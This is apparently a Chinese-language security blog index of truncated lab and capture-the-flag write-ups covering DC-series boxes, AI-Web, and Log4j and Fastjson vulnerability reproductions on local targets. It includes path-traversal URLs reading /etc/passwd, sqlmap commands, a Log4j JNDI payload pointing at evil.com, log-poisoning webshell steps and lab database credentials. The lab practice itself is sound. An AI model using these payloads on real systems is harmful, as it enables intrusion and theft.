ke1nys`Blog

点击签到只需要一直点击就行，最后会在末尾输出flag Dreamer题目 一个框架 下载题目给的文件，发现后台地址 于是进行登录 然后google查找该漏洞发现 Dreamer CMS 代码审计 跟着搞就能拿到flag 访问前端页面的test就行了

扫c段 接下来进行端口扫描 这里的话401状态码是 就是没有成功进行身份验证的意思 得需要拿到管理员的账号密码 发现只有两个段口，于是进行访问 进行注册登录后的得到的界面 这个是关键 （刚开始看的时候都不知道这是啥玩意) 还是接触太少了 发现漏洞库里确实存在该漏洞 这里第三个文件可以进行查看，有点像目录穿越的漏洞，进行后面路径的读取 1http://192.168.0.105/download.php?file_name=../../../../../../../../../../../../../etc/passwd ##利用漏洞看passwd 发现可以进行目录穿越来读取文件 在/etc/passwd/下面发现了 两个用户 分别是 aiweb2 n0nr00tuser可能等下需要用到先放着 接着读取一下apache 文件 读取apache的配置文件是因为网站是由apache组成，并且/etc/shadow访问不了，读取不到文件内容，于是就从apache的配置文件下手 1192.168.0.105/download.php?file_name=../../. ...

先扫一下c段 发现主机 接下来进行端口扫描 发现只扫到了一个80端口 于是尝试进行访问 就出现这个玩意 然后进行目录扫描 发现存在一个robots.txt文件,于是进行访问 发现了网络爬虫协议 robots 访问一下 发现了两个目录/m3diNf0/和/se3reTdir777/uploads/依次进行访问。 两个访问全是访问不了，于是尝试接着进行目录扫描 两个目录只扫出一个目录能进行访问，于是尝试进行访问 执行了phpinfo ，通过这个来查看有没有关键信息 发现了网站的绝对路径还有另一个路径/se3reTdir777/uploads/ 发现了一个index.php 访问该网站，觉得像是存在sql注入，于是进行sqlmap测试 查数据库 1sqlmap -u "http://192.168.142.138/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs #列出库 查出数据库，然后进行表的查询 1sqlmap -u "http://192. ...

CVE-2021-44228 Apache Log4j 远程代码执行漏洞漏洞描述Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码。 参考地址： 1https://github.com/vulhub/vulhub 复制 本次漏洞复现也是基于Vulhub 漏洞复现1docker-compose up -d --build 访问http://127.0.0.1:8983/solr/#/ 进行dns测试看是否存在漏洞 先拿一个域名 构造 ${jndi:dns://${sys:java.version}.example.com}是利用JNDI发送DNS请求的Payload： 1http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://$ ...

先了解一下着几个等会复现需要用到的东西 干货｜最全fastjson漏洞复现与绕过 CVE-2017-18349即Fastjson1.2.24 反序列化漏洞RCEubuntu: 靶机 192.168.142.137 kali: 攻击机 192.168.142.129 漏洞原理fastjson在解析json对象时，会使用autoType实例化某一个具体的类，并调用set/get方法访问属性。漏洞出现在Fastjson autoType处理json对象时，没有对@type字段进行完整的安全性验证，我们可以传入危险的类并调用危险类连接远程RMI服务器，通过恶意类执行恶意代码，进而实现远程代码执行漏洞。 影响版本为 fastjson < 1.2.25 漏洞复现首先进入fastjson 1.2.24的docker环境，使用java -version查看一下java的版本为1.8.0_102。因为java环境为102，没有com.sun.jndi.rmi.object.trustURLCodebase的限制，可以使用com.sun.rowset.JdbcRowSetImpl利用链 ...

总结：sql注入，端口敲门，覆盖passwd提权 先扫一下c段 发现主机，然后进行端口扫描 还是着两个常规端口 这就是上面state的解释 简单来说就是不知道22端口是开的还是关的 于是我们就去尝试一下访问80端口 发现一个网站，但是不是一个cms 于是我们就开始探索网站，看存在哪些可以利用的地方 上面的sql语句会把下面的内容给爆出来，所以就是说这个地方存在sql漏洞，那么我们就可以进行sqlmap查看 1234sqlmap -u "http://192.168.1.10/results.php" --data "search=1" --dbs --batchsqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" --tables --dbs --batchsqlmap -u "http://192.168.1.10/results.php" --data &quo ...

总结：exim4提权 先扫一下c段，找一下靶机 接下来扫一下端口，看开放了哪些端口 发现存在了两个端口 80 和 22 访问80端口 还是老样子，还是这个cms 这个版本的话很像存在漏洞的样子 Droopescan是一款基于插件的扫描器，可帮助安全研究人员发现Drupal，SilverStripe，Wordpress，Joomla（枚举版本信息和可利用URL地址）和Moodle的问题。 学习一下这一款工具 12345678git clone https://github.com/droope/droopescan.gitcd droopescanpip install -r requirements.txt./droopescan scan --help 使用工具droopescan扫一下后台（因为也是第一次使用所以也是学习了一下）后台地址： 192.168.0.104/user/login我们还是先看下网站有没有漏洞先 这里也可以使用 使用别的扫描工具进行扫描，效果是一样的 发现存在类似sql注入的感觉，拿sqlmap来进行尝试一下 1sqlmap -u http://19 ...

总结：社工尝试 先扫一下c段，发现一下靶机 然后扫一下端口 只有两端口是开放的 80 22 熟悉的drupal框架，只不过这个版本比较新，之前存在漏洞的是7 msf找不到 然后尝试一下searchsploit工具，发现是找到的漏洞版本都太新，不适合 然后扫目录 sqlmap 尝试后都无果 最后后翻译了一下网站给的话 123DC-7引入了一些“新”概念，但我将留给你们去弄清楚它们是什么。：-）虽然这个挑战并不完全是技术性的，但如果你需要诉诸暴力或字典攻击，你可能不会成功。你要做的是跳出框框思考。在盒子外面。：-） 发现存在也该一个玩意，于是尝试去网上进行搜索发现了一个github地址 发现这个github地址 于是查看配置文件发现 1234567<?php $servername = "localhost"; $username = "dc7user"; $password = "MdR3xOgB7#dW"; $dbname = "Staff"; $conn = mysqli ...

总结:wpscan爆破，nmap提权 发现靶机ip 接下来进行端口扫描 还是两个正常端口 22和80 然后访问80端口 访问不了 但出现了一个域名 猜测是域名解析的问题 于是就去修改 /etc/hosts 修改后访问成功，发现是wordpress框架的 于是就可以使用wpscan工具进行扫描了 先扫一下网站有哪些用户 wpscan --url -e 发现存在好几个用户 那么我们就尝试扫目录，看能不能扫出后台登录地址来 发现存在类似后台的目录 成功发现后台 这里的话是不知道密码的 于是我们就选择进行爆破 但是如果这里使用的是cewl根据这个网站生成的密码的话 然后使用wpscan进行爆破的话，是不会成功的 因为生成的字典里没有那个密码 (下面这种是不会成功的) 123456789101112//根据网页的内容输出一个字典cewl https://www.wordy.com/ -w pass.txt //使用命令枚举这个网站的用户wpscan --url https://www.wordy.com/ -e u #使用这个没有枚举成功wpscan --url ...

总结：screen-4.5.0提权 先扫一下端口 发现了一个rpcbind的东西 先去查查这是个什么东西 题目这里给了这个端口的服务的话，肯定是会存在漏洞，等会我们可以去查查这个服务的漏洞 除了这里之外没有别的地方可以写东西了，那么我们就尝试一下去扫一下目录 扫到一些目录 只有这个目录是新的 thankyou.php 其他目录就是网站上的目录，那么我们就访问这个目录 这里的话有个file参数可进行任意文件的读取 确实可以进行任意文件的读取 这里话由于这个网站是nginx的，那么我们就想一下看能不能进行日志文件包含 1http://172.16.5.8/thankyou.php?file=/var/log/nginx/access.log ##看日志文件 成功读取，那么我们就尝试一下看能不能写进去一句话木马 抓包后，进行写一句话木马 这里还有一种写法在这篇文章 就是利用写入不是文件名，然后报错把内容写入error.log error.log方法的文章 ctf题目是在user-Agent处写的，但是这里写不进去，于是就在GET处写 然后尝 ...